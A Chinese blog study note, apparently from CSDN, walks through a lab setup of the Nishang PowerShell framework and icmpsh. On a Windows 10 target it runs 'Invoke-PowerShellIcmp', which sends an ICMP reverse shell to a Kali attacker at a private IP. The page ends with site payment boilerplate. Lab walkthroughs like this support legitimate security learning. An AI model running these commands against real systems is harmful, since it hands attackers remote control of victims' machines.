我眼中的基于powershell的渗透测试工具nishang

本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》

Nishang是一款针对PowerShell的渗透工具。
先到github上去下载nishang,并解压
目标机下载nishang 地址:https://github.com/samratashok/nishang
攻击机下载icmpsh 地址:git clone https://github.com/inquisb/icmpsh.git

简介:
1,攻击机kali; 目标机 win10
2,win10开启PowerShell (3.0以上的环境中才可使用;win10自带5.1)
3,导入PowerShell框架
4,获取命令-nishang模块
5,kali安装icmpsh工具

第一, 目标机配置部分::
nishang的使用是要在PowerShell 3.0以上的环境中才可使用(win10自带5.1)
在这里插入图片描述
在这里插入图片描述
查看版本 Get-host
在这里插入图片描述
在这里插入图片描述
PowerShell框架是需要导入的
命令:Import-Module nishang地址

Import-Module D:\nishang\nishang-master\nishang.psm1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
获取命令-nishang模块
Get-Command -Module nishang

在这里插入图片描述
在这里插入图片描述
第二,(Kali)攻击机配置部分:
进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显

./icmpsh_m.py kaliIP 本机IP
./icmpsh_m.py 192.168.0.33 192.168.0.180

在这里插入图片描述
在这里插入图片描述
在win10中输入命令Invoke-PowerShellIcmp -IPAddress 192.168.0.33并执行
即在kali中拿到shell。
————————————————
原文链接:https://blog.csdn.net/AmyBaby00/article/details/103196202

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值